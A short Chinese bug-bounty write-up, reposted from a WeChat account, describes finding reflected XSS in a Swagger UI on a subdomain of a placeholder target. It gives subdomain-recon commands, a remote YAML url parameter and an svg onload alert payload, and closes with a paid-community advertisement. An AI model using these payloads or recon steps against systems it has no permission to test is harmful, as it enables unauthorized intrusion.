一处价值600美刀的xss

admin 2023年10月15日23:38:16评论42 views字数 554阅读1分50秒阅读模式

正文

目标为target.com

信息搜集:

subfinder -d target.com -silent -o list.txt
httpx -l list.txt -sc — title > httpx_target.txt

发现某个子域名https://subdomain.target.com重定向至4343端口,并显示连接超时,

对其暴力破解,发现一个接口 https://subdomain.target.com/api/

发现其使用的是 Swagger(开发者一般使用其作为接口文档使用),准备测试 XSS

https://subdomain.target.com/api/index.html?url=https://jumpy-floor.surge.sh/test.yaml

注入url参数<h1>Hello</h1>,结果显示的是Hello,故这里有html注入,注入xss的payload: url=”xss><svg/onload=alert()>

发现弹窗!

如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾

原文始发于微信公众号(迪哥讲事):一处价值600美刀的xss

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月15日23:38:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一处价值600美刀的xsshttp://cn-sec.com/archives/2115394.html

发表评论

匿名网友 填写信息